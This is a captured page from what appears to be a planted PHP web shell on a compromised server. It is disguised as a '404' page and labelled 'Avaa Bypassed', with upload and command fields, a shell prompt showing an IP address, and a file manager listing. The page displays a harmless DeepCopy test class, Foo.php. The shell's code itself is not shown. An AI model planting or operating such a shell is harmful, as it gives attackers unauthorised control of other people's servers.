404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.135.218.67: ~ $
<?php declare(strict_types=1);

namespace DeepCopy\f003;

class Foo
{
    private $name;
    private $prop;

    public function __construct($name)
    {
        $this->name = $name;
    }

    public function getProp()
    {
        return $this->prop;
    }

    public function setProp($prop)
    {
        $this->prop = $prop;

        return $this;
    }
}

Filemanager

Name Type Size Permission Actions
Foo.php File 388 B 0644